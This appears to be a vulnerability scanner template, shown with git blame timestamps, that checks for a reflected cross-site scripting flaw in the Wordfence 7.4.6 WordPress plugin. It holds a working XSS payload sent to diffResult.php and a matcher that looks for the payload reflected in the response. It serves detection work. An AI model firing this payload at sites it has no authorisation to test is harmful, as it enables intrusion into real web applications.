2020-04-08 16:49:00 +00:00
|
|
|
id: wordpress-wordfence-xss
|
2020-04-08 12:06:42 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress Wordfence 7.4.6 Cross Site Scripting
|
|
|
|
author: madrobot
|
2020-05-24 22:19:21 +00:00
|
|
|
severity: medium
|
2020-04-08 12:06:42 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E"
|
|
|
|
matchers:
|
2020-04-08 13:27:59 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2020-05-24 22:19:21 +00:00
|
|
|
- "<svg/onload=alert(1337)>"
|
2020-08-31 18:34:29 +00:00
|
|
|
part: body
|